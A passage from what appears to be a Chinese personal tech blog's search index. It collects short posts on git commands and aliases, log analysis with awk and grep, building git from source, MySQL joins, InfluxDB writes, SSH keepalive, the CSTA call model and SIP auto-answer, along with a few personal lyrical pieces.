public/javascripts/app-qc.js | 83 +++++++++++++++++++++++++-- views/menu.html | 1 + views/qc-template-show-modal.html | 114 ++++++++++++++++++++++++++++++++++++++ views/qc-template.html | 7 ++- 4 files changed, 198 insertions(+), 7 deletions(-) create mode 100644 views/qc-template-show-modal.html // 有时候只想合并某次commit到当前分支,而不是合并整个分支,可以使用 cherry-pick 合并 git cherry-pick commitId 2.2.5. 分支删除 // 删除远程dev分支 git push --delete origin dev // 删除本地dev分支 git branch -D dev 2.2.6. 拉取本地不存在的远程分支 // 假设现在在master分支, 我需要拉取远程的dev分支到本地,而本地没有dev分支 // 拉取远程分支到本地 git fetch origin 远程分支名:本地分支名 git fetch origin dev:dev // 切换到dev分支 git checkout dev // 本地dev分支关联远程dev分支, 如果不把本地dev分支关联远程dev分支,则执行git pull和git push命令时会报错 git branch --set-upstream-to=origin/dev // 然后你就可以在dev分支上编辑了 2.3. 版本对比 // 查看尚未暂存的文件更新了哪些部分 git diff // 查看某两个版本之间的差异 git diff commitID1 commitID2 // 查看某两个版本的某个文件之间的差异 git diff commitID1:filename1 commitID2:filename2 2.4. 日志查看 git log git shortlog 2.5. 撤销修改 2.5.1. 撤销处于修改状态的文件 如果你修改了某个文件,但是还没有commit到本地仓库。\ngit checkout -- somefile.js 2.5.2 丢弃所有未提交的改变 git clean 用来删除未跟踪的新创建的文件或者文件夹\ngit checkout . \u0026amp;\u0026amp; git clean -xdf\ngit clean\n-x 不读取gitignore中的忽略规则 -d 删除所有未跟踪的文件和文件夹 -f 强制 3. 
oh-my-zsh中常用的git缩写 alias ga=\u0026#39;git add\u0026#39; alias gb=\u0026#39;git branch\u0026#39; alias gba=\u0026#39;git branch -a\u0026#39; alias gbd=\u0026#39;git branch -d\u0026#39; alias gcam=\u0026#39;git commit -a -m\u0026#39; alias gcb=\u0026#39;git checkout -b\u0026#39; alias gco=\u0026#39;git checkout\u0026#39; alias gcm=\u0026#39;git checkout master\u0026#39; alias gcp=\u0026#39;git cherry-pick\u0026#39; alias gd=\u0026#39;git diff\u0026#39; alias gfo=\u0026#39;git fetch origin\u0026#39; alias ggpush=\u0026#39;git push origin $(git_current_branch)\u0026#39; alias ggsup=\u0026#39;git branch --set-upstream-to=origin/$(git_current_branch)\u0026#39; alias glgp=\u0026#39;git log --stat -p\u0026#39; alias gm=\u0026#39;git merge\u0026#39; alias gp=\u0026#39;git push\u0026#39; alias gst=\u0026#39;git status\u0026#39; alias gsta=\u0026#39;git stash save\u0026#39; alias gstp=\u0026#39;git stash pop\u0026#39; alias gl=\u0026#39;git pull\u0026#39; alias glg=\u0026#39;git log --stat\u0026#39; alias glgp=\u0026#39;git log --stat -p\u0026#39; alias glgga=\u0026#39;git log --graph --decorate --all\u0026#39; // 图形化查看分支之间的发展关系 oh-my-zsh git命令缩写完整版\n4. 参考文献 git 命令参考 《Pro Git 中文版》 廖雪峰 git教程 猴子都能懂的GIT入门 ","permalink":"https://wdd.js.org/posts/2019/10/gmb0oi/","summary":"如果命令行可以解决的问题,就绝对不要用GUI工具。快点试用Git bash吧, 别再用TortoiseGit了。\n1. 必会8个命令 下面的操作都是经常使用的,有些只需要做一次,有些是经常操作的\ngit命令虽然多,但是经常使用的不超过8个。\n命令 执行次数 说明 git clone http://sdfjslf.git 每个项目只需要执行一次 //克隆一个项目 git fetch origin round-2 每个分支只需要执行一次 //round-2分支在本地不存在,首先要创建一个分支 git checkout round-2 多次 // 切换到round-2分支 git branch --set-upstream-to=origin/round-2 每个分支只需要执行一次 // 将本地round-2分支关联远程round-2分支 git add -A 每次增加文件都要执行 // 在round-2下创建了一个文件, 使用-A可以添加所有文件到暂存区 git commit -am \u0026quot;我增加了一个文件\u0026quot; 每次提交都要执行 // commit git push 每次推送都要执行 //最好是在push之前,使用git pull拉取远程代码到本地,否则有可能被拒绝 git pull 每次拉取都要执行 拉取远程分支代码到本地并合并到当前分支 2. 常用的git命令 假设你在master分支上\n// 将本地修改后的文件推送到本地仓库 git commit -am \u0026#39;修改了一个问题\u0026#39; // 将本地仓库推送到远程仓库 git push 2.1. 
状态管理 2.","title":"gitbash生存指南 之 git常用命令与oh-my-zsh常用缩写"},{"content":"免费产品的盈利模式有四种\n投放广告 增值服务:先把羊养肥,再慢慢割羊毛,现在大部分互联网服务都是这种 交叉补贴: A服务免费,在用户使用A服务时,通过提供B服务来盈利 零边际成本:免费提供A服务,但是用户需要用物品去交换A服务,服务提供者通过加工物品来盈利 ","permalink":"https://wdd.js.org/posts/2019/10/ce03id/","summary":"免费产品的盈利模式有四种\n投放广告 增值服务:先把羊养肥,再慢慢割羊毛,现在大部分互联网服务都是这种 交叉补贴: A服务免费,在用户使用A服务时,通过提供B服务来盈利 零边际成本:免费提供A服务,但是用户需要用物品去交换A服务,服务提供者通过加工物品来盈利 ","title":"免费服务的盈利模式"},{"content":"1. 实验准备 T450笔记本 2. 进入BIOS 重启电脑 一直不停按enter 按F1 选择Keyboard/mouse 3. 恢复F1-F12原始功能: fn and ctrl key swap [enabled]\n4. 切换ctrl和fn的位置: F1-F12 as primary function [enabled]\n5. 保存,退出 ","permalink":"https://wdd.js.org/posts/2019/10/qzbgvf/","summary":"1. 实验准备 T450笔记本 2. 进入BIOS 重启电脑 一直不停按enter 按F1 选择Keyboard/mouse 3. 恢复F1-F12原始功能: fn and ctrl key swap [enabled]\n4. 切换ctrl和fn的位置: F1-F12 as primary function [enabled]\n5. 保存,退出 ","title":"thinkpad 系列恢复F1-F12原始功能,切换ctrl和fn的位置"},{"content":"1. 内容概要 CSTA 协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA 协议标准 2.1. 什么是 CSTA ? CSTA:电脑支持通讯程序(Computer Supported Telecommunications Applications) 基本的呼叫模型在 1992 建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等 CSTA 是一个应用层接口,用来监控呼叫,设备和网络 CSTA 创建了一个通讯程序的抽象层: CSTA 并不依赖任何底层的信令协议 E.g. H.323, SIP, Analog, T1, ISDN, etc. CSTA 并不要求用户必须使用某些设备 E.g. intelligent endpoints, low-function/stimulus devices, SIP signaling models - 3PCC vs. Peer/Peer 适用不同的操作模式 第三方呼叫控制 一方呼叫控制 CSTA 的设计目标是为了提高各种 CSTA 实现之间的移植性 规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段 1 (发布于 June ’92) 40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段 2 (发布于 Dec. ’94) 77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段 3 - CSTA Phase II Features \u0026amp; versit CTI Technology 发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为 ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec. 
02 发布 CSTA WSDL (ECMA-348) June 2004 June 2004: 发布对象模型 TR/88 June 2004: 发布 “Using CSTA for SIP Phone User Agents (uaCSTA)” TR/87 June 2004: 发布 “Application Session Services” (ECMA-354) June 2005: 发布 “WS-Session: WSDL for ECMA-354”(ECMA-366) December 2005 : 发布 “Management Notification and Computing Function Services” December 2005 : Session Management, Event Notification, Amendments for ECMA-348” (TR/90) December 2006 : Published new editions of ECMA-269, ECMA-323, ECMA-348 4. CSTA 标准文档 5. CSTA 标准扩展 新的特性可以被加入标准通过发布新版本的标准 新的参数,新的值可以被加入通过发布新版本的标准 未来的新版本必须向后兼容 具体的实施可以增加属性通过 CSTA 自带的扩展机制(e.g. ONS – One Number Service) 6. CSTA 操作模型 CSTA 操作模型由计算域和转换域组成,是 CSTA 定义在两个域之间的接口 CSTA 标准规定了消息(服务以及事件上报),还有与之相关的行为 计算域是 CSTA 程序的宿主环境,用来与转换域交互与控制 转换域 - CSTA 模型提供抽象层,程序可以观测并控制的。转换域包括一些对象例如 CSTA 呼叫,设备,链接。 7. CSTA 操作模型:呼叫,设备,链接 相关说明\n8. 参考 CSTAoverview CSTA_introduction_and_overview ","permalink":"https://wdd.js.org/opensips/ch1/csta-call-model/","summary":"1. 内容概要 CSTA 协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA 协议标准 2.1. 什么是 CSTA ? CSTA:电脑支持通讯程序(Computer Supported Telecommunications Applications) 基本的呼叫模型在 1992 建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等 CSTA 是一个应用层接口,用来监控呼叫,设备和网络 CSTA 创建了一个通讯程序的抽象层: CSTA 并不依赖任何底层的信令协议 E.g. H.323, SIP, Analog, T1, ISDN, etc. CSTA 并不要求用户必须使用某些设备 E.g. intelligent endpoints, low-function/stimulus devices, SIP signaling models - 3PCC vs. Peer/Peer 适用不同的操作模式 第三方呼叫控制 一方呼叫控制 CSTA 的设计目标是为了提高各种 CSTA 实现之间的移植性 规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段 1 (发布于 June ’92) 40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段 2 (发布于 Dec. 
’94) 77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段 3 - CSTA Phase II Features \u0026amp; versit CTI Technology 发布于 Dec.","title":"CSTA 呼叫模型简介"},{"content":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列\n日志列数比较少或者要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。\n比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分隔符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk按列提取。最好用的方式是用 grep 的正则提取。\n好像 grep 不支持捕获分组,所以只能提取出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA\nE 表示使用正则 o 表示只显示匹配到的内容 \u0026gt; grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBB\u0026#34; cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBJ\u0026#34; 统计 对输出的关键词进行统计,并按照升序或者降序排列。\n将关键词按照列或者按照正则提取出来之后,首先要进行sort排序, 然后再进行uniq去重。\n不进行排序就直接去重,统计的值就不准确。因为 uniq 去重只能去除连续的相同字符串。不是连续的字符串,则会统计多次。\n下面例子:非连续的 cause:\u0026ldquo;AAA\u0026rdquo;,没有被合并在一起计数\n// bad grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | uniq -c 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; // good AAA 被正确统计了 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort | uniq -c 2 
cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 对统计值排序 sort 默认的排序是按照字典排序, 可以使用-n 参数让其按照数值大小排序。\nn 按照数值排序 r 取反。sort 按照数值排序时,默认是升序,如果想要结果降序,那么需要-r -k -k 可以指定按照某列的数值顺序排序,如-k1,1(指定第一列), -k2,2(指定第二列)。如果不指定-k 参数,那么一般默认第一列。 // 升序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -n 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 2 cause:\u0026#34;AAA\u0026#34; // 降序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -nr 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; ","permalink":"https://wdd.js.org/shell/grep-awk-sort/","summary":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列\n日志列数比较少或者要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。\n比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分隔符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk按列提取。最好用的方式是用 grep 
的正则提取。","title":"awk、grep、cut、sort、uniq简单命令玩转日志分析与统计"},{"content":"https://winmerge.org/?lang=en\nWinMerge-2.16.4-Setup.exe.zip\n","permalink":"https://wdd.js.org/posts/2019/10/zo8dx2/","summary":"https://winmerge.org/?lang=en\nWinMerge-2.16.4-Setup.exe.zip","title":"windows上免费的文本对比工具"},{"content":"route_tree表中需要增加carrier\nid carrier 0 default ","permalink":"https://wdd.js.org/opensips/ch7/without-default-carrier/","summary":"route_tree表中需要增加carrier\nid carrier 0 default ","title":"ERROR:carrierroute:carrier_tree_fixup: default_carrier not found"},{"content":"Step 1: Install Required Packages\nFirstly we need to make sure that we have installed required packages on your system. Use following command to install required packages before compiling Git source.\n# yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel # yum install gcc perl-ExtUtils-MakeMaker Step 2: Uninstall old Git RPM\nNow remove any prior installation of Git through RPM file or Yum package manager. If your older version is also compiled through source, then skip this step.\n# yum remove git Step 3: Download and Compile Git Source\nDownload git source code from kernel git or simply use following command to download Git 2.5.3.\n# cd /usr/src # wget https://www.kernel.org/pub/software/scm/git/git-2.5.3.tar.gz # tar xzf git-2.5.3.tar.gz After downloading and extracting Git source code, use the following command to compile source code.\n# cd git-2.5.3 # make prefix=/usr/local/git all # make prefix=/usr/local/git install # echo \u0026#39;pathmunge /usr/local/git/bin/\u0026#39; \u0026gt; /etc/profile.d/git.sh # chmod +x /etc/profile.d/git.sh # source /etc/bashrc Step 4. Check Git Version\nOn completion of above steps, you have successfully installed Git in your system. 
Use the following command to check the git version\n# git --version git version 2.5.3 I also wanted to add that the \u0026ldquo;Getting Started\u0026rdquo; guide at the GIT website also includes instructions on how to download and compile it yourself:\n","permalink":"https://wdd.js.org/posts/2019/10/gxkb91/","summary":"Step 1: Install Required Packages\nFirstly we need to make sure that we have installed required packages on your system. Use following command to install required packages before compiling Git source.\n# yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel # yum install gcc perl-ExtUtils-MakeMaker Step 2: Uninstall old Git RPM\nNow remove any prior installation of Git through RPM file or Yum package manager. If your older version is also compiled through source, then skip this step.","title":"手工安装git最新版"},{"content":"有些项目,文档写的不是很清楚,很多地方都需要摸着石头过河,在此写下自己的一点心得体会。\n后悔药 哪怕是改动一行代码,也要创建一个新的分支。如果发现前方有无法绕行的故障,你将会庆幸自己给自己留下退路。\n不要把自己逼到死角,永远给自己留下一个B计划。\n小碎步 不要大段重构,要小步慢走。尽量减少发生问题的点。在一本书中找错别字很难,但是在一行文字中找错别字就非常容易了。\n勿猜测 当你不知道某个函数如何使用时,不要去猜测,而应该去看官方文档是如何讲解这个函数的。\n","permalink":"https://wdd.js.org/posts/2019/10/bl933p/","summary":"有些项目,文档写的不是很清楚,很多地方都需要摸着石头过河,在此写下自己的一点心得体会。\n后悔药 哪怕是改动一行代码,也要创建一个新的分支。如果发现前方有无法绕行的故障,你将会庆幸自己给自己留下退路。\n不要把自己逼到死角,永远给自己留下一个B计划。\n小碎步 不要大段重构,要小步慢走。尽量减少发生问题的点。在一本书中找错别字很难,但是在一行文字中找错别字就非常容易了。\n勿猜测 当你不知道某个函数如何使用时,不要去猜测,而应该去看官方文档是如何讲解这个函数的。","title":"如何面对未知的项目"},{"content":"一个人喝粥太淡,两个人电话粥太甜。回忆似水流年,翘首如花美眷。对着微信聊天,凌晨了也没有觉得晚。窗外的月亮很圆,就像你那双明亮的眼。说一声晚安,道一声再见,我的梦中是有你的春天。\n","permalink":"https://wdd.js.org/posts/2019/10/an4am1/","summary":"一个人喝粥太淡,两个人电话粥太甜。回忆似水流年,翘首如花美眷。对着微信聊天,凌晨了也没有觉得晚。窗外的月亮很圆,就像你那双明亮的眼。说一声晚安,道一声再见,我的梦中是有你的春天。","title":"一个人喝粥太淡"},{"content":"你有邮箱吗?如果你有的话,那么当我不在你身边的时候,我会每天给你写一封信,告诉你,我今天遇见的的人,告诉你,我身边发生的事,告诉你,当你不在我身边时,我有多想你\n","permalink":"https://wdd.js.org/posts/2019/10/tgn9th/","summary":"你有邮箱吗?如果你有的话,那么当我不在你身边的时候,我会每天给你写一封信,告诉你,我今天遇见的的人,告诉你,我身边发生的事,告诉你,当你不在我身边时,我有多想你","title":"你有邮箱吗?"},{"content":"表复制 # 不跨数据库 insert into 
subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; ","permalink":"https://wdd.js.org/posts/2019/10/nhrhfr/","summary":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; ","title":"MySql表复制 与 调整字段"},{"content":"表wdd_a 表wdd_b\n不使用where子句生成的表的数是两个表行数的积,其字段的字段两个表的拼接\n查询的行数 = 表a的行数 x 表b的行数\nSELECT * FROM `wdd_a` join `wdd_b` order by wdd_a.id 表联合不使用where子句,会存在两个问题\n查询出来的结果没有意义 产生大量的无用数据,例如1000行的表a联合1000行的表b,将会产生1000*1000行的结果 SELECT * FROM `wdd_a` join `wdd_b` where wdd_a.id = wdd_b.id 当使用表联合之后,产生的数据\n是有意义的 查询结果的行数一定比两张表的行数都要少 下面是一个复杂的例子,给表起了别名,另外也只抽取了部分字段\nSELECT `a`.`id` AS `id`, `a`.`caller_id_dpid` AS `caller_id_dpid`, `a`.`callee_id_dpid` AS `callee_id_dpid`, `a`.`trunk_group` AS `trunk_group`, `b`.`domain` AS `domain` FROM (`wj_route_group` `a` join `domain` `b`) where (`a`.`id` = `b`.`route_group_id`); ","permalink":"https://wdd.js.org/posts/2019/10/gdeknt/","summary":"表wdd_a 表wdd_b\n不使用where子句生成的表的数是两个表行数的积,其字段的字段两个表的拼接\n查询的行数 = 表a的行数 x 表b的行数\nSELECT * FROM `wdd_a` join `wdd_b` order by wdd_a.id 表联合不使用where子句,会存在两个问题\n查询出来的结果没有意义 产生大量的无用数据,例如1000行的表a联合1000行的表b,将会产生1000*1000行的结果 SELECT * FROM `wdd_a` join `wdd_b` where wdd_a.id = wdd_b.id 当使用表联合之后,产生的数据\n是有意义的 查询结果的行数一定比两张表的行数都要少 下面是一个复杂的例子,给表起了别名,另外也只抽取了部分字段\nSELECT `a`.`id` AS `id`, `a`.`caller_id_dpid` AS `caller_id_dpid`, `a`.`callee_id_dpid` AS `callee_id_dpid`, `a`.`trunk_group` AS `trunk_group`, `b`.`domain` AS `domain` FROM (`wj_route_group` `a` join `domain` `b`) where (`a`.`id` = `b`.`route_group_id`); ","title":"理解mysql 表连接"},{"content":"你何时结婚 玩纸牌者 梦 鲍尔夫人的肖像 呐喊 裸体 绿叶 半身像 加歇医生 
拿烟斗的男孩 老吉他手 红黄蓝的构成II 蒙德里安 镜前少女 神奈川冲浪 ","permalink":"https://wdd.js.org/posts/2019/10/cgr19x/","summary":"你何时结婚 玩纸牌者 梦 鲍尔夫人的肖像 呐喊 裸体 绿叶 半身像 加歇医生 拿烟斗的男孩 老吉他手 红黄蓝的构成II 蒙德里安 镜前少女 神奈川冲浪 ","title":"世界名画"},{"content":"刀耕火种:没有docker的时代 想想那些没有docker的时光, 我们是怎么玩linux的。\n首先你要先装一个vmware或者virtualbox, 然后再下载一个几个GB的ISO文件,然后一步两步三步的经过十几个步骤,终于装好了一个虚拟机。这其中的步骤,每一步都可能有几个坑在等你踩。\n六年前,也就是在2013的时候,docker出现了,这个新奇的东西,可以让你用一行命令运行一个各种linux的发行版。\ndocker run -it centos docker run -it debian 黑色裂变:docker时代 docker 官网上,有个对docker非常准确的定位:\nDocker: The Modern Platform for High-Velocity Innovation\n我觉得这行英文很好理解,但是不好翻译,从中抽取一个最重要的关键词。\u0026ldquo;High-Velocity\u0026rdquo;,可以理解为加速,提速。\n那么docker让devops提速了多少呢?\n没有docker的时代,如果可以称为冷兵器时代的话,docker的出现,将devops带入了热兵器时代。\n我们不用再准备石头,木棍,不需要打磨兵器,我们唯一要做的事情,瞄准目标,扣动扳机。\n运筹帷幄:k8s时代 说实在的,我还没仔细去体味docker的时代时,就已经进入了k8s时代。k8s的出现,让我们可以不用管docker, 可以直接跳过docker, 直接学习k8s的概念与命令。\nk8s的好处就不再多说了,只说说它的缺点。\n资源消耗大:k8s单机版没什么意义,一般都是集群,你需要多台虚拟机 部署耗费精力:想要部署k8s,要部署几个配套的基础服务 k8s对于tcp服务支持很好,对于udp服务支持欠佳。 所以如果我们仅仅是需要一个环境,跑跑自己的代码,相比于k8s,docker无疑是最方便且便宜的选择。\n说实在的,我之前一直对docker没有全面的掌握,系统的学习,我将会在这个知识库里,系统的梳理docker相关的知识和实战经验。\n帝国烽烟:云原生时代 微服务 应用编排调度 容器化 面向API 参考 https://en.wikipedia.org/wiki/Docker,_Inc. 
https://thenewstack.io/10-key-attributes-of-cloud-native-applications/ https://jimmysong.io/kubernetes-handbook/cloud-native/cloud-native-definition.html https://www.redhat.com/en/topics/cloud-native-apps ","permalink":"https://wdd.js.org/posts/2019/10/nzpt8a/","summary":"刀耕火种:没有docker的时代 想想那些没有docker的时光, 我们是怎么玩linux的。\n首先你要先装一个vmware或者virtualbox, 然后再下载一个几个GB的ISO文件,然后一步两步三步的经过十几个步骤,终于装好了一个虚拟机。这其中的步骤,每一步都可能有几个坑在等你踩。\n六年前,也就是在2013的时候,docker出现了,这个新奇的东西,可以让你用一行命令运行一个各种linux的发行版。\ndocker run -it centos docker run -it debian 黑色裂变:docker时代 docker 官网上,有个对docker非常准确的定位:\nDocker: The Modern Platform for High-Velocity Innovation\n我觉得这行英文很好理解,但是不好翻译,从中抽取一个最重要的关键词。\u0026ldquo;High-Velocity\u0026rdquo;,可以理解为加速,提速。\n那么docker让devops提速了多少呢?\n没有docker的时代,如果可以称为冷兵器时代的话,docker的出现,将devops带入了热兵器时代。\n我们不用再准备石头,木棍,不需要打磨兵器,我们唯一要做的事情,瞄准目标,扣动扳机。\n运筹帷幄:k8s时代 说实在的,我还没仔细去体味docker的时代时,就已经进入了k8s时代。k8s的出现,让我们可以不用管docker, 可以直接跳过docker, 直接学习k8s的概念与命令。\nk8s的好处就不再多说了,只说说它的缺点。\n资源消耗大:k8s单机版没什么意义,一般都是集群,你需要多台虚拟机 部署耗费精力:想要部署k8s,要部署几个配套的基础服务 k8s对于tcp服务支持很好,对于udp服务支持欠佳。 所以如果我们仅仅是需要一个环境,跑跑自己的代码,相比于k8s,docker无疑是最方便且便宜的选择。\n说实在的,我之前一直对docker没有全面的掌握,系统的学习,我将会在这个知识库里,系统的梳理docker相关的知识和实战经验。\n帝国烽烟:云原生时代 微服务 应用编排调度 容器化 面向API 参考 https://en.wikipedia.org/wiki/Docker,_Inc. 
https://thenewstack.io/10-key-attributes-of-cloud-native-applications/ https://jimmysong.io/kubernetes-handbook/cloud-native/cloud-native-definition.html https://www.redhat.com/en/topics/cloud-native-apps ","title":"虚拟化浪潮"},{"content":"创建数据库 curl -i -XPOST http://localhost:8086/query --data-urlencode \u0026#34;q=CREATE DATABASE testdb\u0026#34; 写数据到数据库 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary \u0026#39;cpu_load_short,host=server01,region=us-west value=0.64 1434055562000000000\u0026#39; 批量写入 output.txt\nnginx_second,tag=ip169 value=21 1592638800000000000 nginx_second,tag=ip169 value=32 1592638801000000000 nginx_second,tag=ip169 value=20 1592638802000000000 nginx_second,tag=ip169 value=11 1592638803000000000 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary @output.txt 参考 https://docs.influxdata.com/influxdb/v1.7/guides/writing_data/ ","permalink":"https://wdd.js.org/posts/2019/10/eqgykt/","summary":"创建数据库 curl -i -XPOST http://localhost:8086/query --data-urlencode \u0026#34;q=CREATE DATABASE testdb\u0026#34; 写数据到数据库 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary \u0026#39;cpu_load_short,host=server01,region=us-west value=0.64 1434055562000000000\u0026#39; 批量写入 output.txt\nnginx_second,tag=ip169 value=21 1592638800000000000 nginx_second,tag=ip169 value=32 1592638801000000000 nginx_second,tag=ip169 value=20 1592638802000000000 nginx_second,tag=ip169 value=11 1592638803000000000 curl -i -XPOST \u0026#39;http://localhost:8086/write?db=mydb\u0026#39; --data-binary @output.txt 参考 https://docs.influxdata.com/influxdb/v1.7/guides/writing_data/ ","title":"influxdb http操作"},{"content":"编辑这个文件 ~/.ssh/config 在顶部添加下边两行 Host * ServerAliveInterval=30 每隔30秒向服务端发送 no-op包\n","permalink":"https://wdd.js.org/posts/2019/10/swoxa5/","summary":"编辑这个文件 ~/.ssh/config 在顶部添加下边两行 Host * ServerAliveInterval=30 每隔30秒向服务端发送 no-op包","title":"ssh保持连接状态不断开"},{"content":"Notify 
使用notify消息,通知分机应答,这个notify一般发送在分机回180响应之后\nAnswer-mode Answer-Mode一般有两个值 Auto: UA收到INVITE之后,立即回200OK,没有180的过程 Manual: UA收到INVITE之后,等待用户手工点击应答 通常Answer-Mode还会跟着require, 表示某个应答方式如果不被允许,应当回403 Forbidden 作为响应。\nAnswer-Mode: Auto;require 和Answer-mode头类似的有个SIP头叫做:Priv-Answer-Mode,这个功能和Answer-Mode类似,但是他有个特点。\n如果UA设置了免打扰,Priv-Answer-Mode头会无视免打扰这个选项,强制让分机应答,这个头适合用于紧急呼叫。\n结论 如果要实现分机的自动应答,显然Answer-Mode的应答速度会更快。但是对于依赖180响应的系统,可能要考虑这种没有180响应的情况。\n要记住,在SIP消息里,对于UA来说,1xx的响应都不是必须的,是可以缺少的。\n","permalink":"https://wdd.js.org/opensips/ch1/ua-answer-mode/","summary":"Notify 使用notify消息,通知分机应答,这个notify一般发送在分机回180响应之后\nAnswer-mode Answer-Mode一般有两个值 Auto: UA收到INVITE之后,立即回200OK,没有180的过程 Manual: UA收到INVITE之后,等待用户手工点击应答 通常Answer-Mode还会跟着require, 表示某个应答方式如果不被允许,应当回403 Forbidden 作为响应。\nAnswer-Mode: Auto;require 和Answer-mode头类似的有个SIP头叫做:Priv-Answer-Mode,这个功能和Answer-Mode类似,但是他有个特点。\n如果UA设置了免打扰,Priv-Answer-Mode头会无视免打扰这个选项,强制让分机应答,这个头适合用于紧急呼叫。\n结论 如果要实现分机的自动应答,显然Answer-Mode的应答速度会更快。但是对于依赖180响应的系统,可能要考虑这种没有180响应的情况。\n要记住,在SIP消息里,对于UA来说,1xx的响应都不是必须的,是可以缺少的。","title":"UA应答模式的实现"},{"content":"前些天,有朋友推荐一部美剧《致命女人》,听着名字,觉得有点像特工或者犯罪系列的电视剧。\n看了前第一集之后,才发现这个剧是讲述关于婚姻方面问题美剧。\n一般情况下,我不喜欢看婚姻题材的影视。但是,任何事情都逃不过真相定律。\n","permalink":"https://wdd.js.org/posts/2019/09/zgwg91/","summary":"前些天,有朋友推荐一部美剧《致命女人》,听着名字,觉得有点像特工或者犯罪系列的电视剧。\n看了前第一集之后,才发现这个剧是讲述关于婚姻方面问题美剧。\n一般情况下,我不喜欢看婚姻题材的影视。但是,任何事情都逃不过真相定律。","title":"致命女人 Why Women Kill"},{"content":"git clean -n # 打印哪些文件将会被删除 git clean -f # 删除文件 git clean -fd # 删除文件和目录 参考 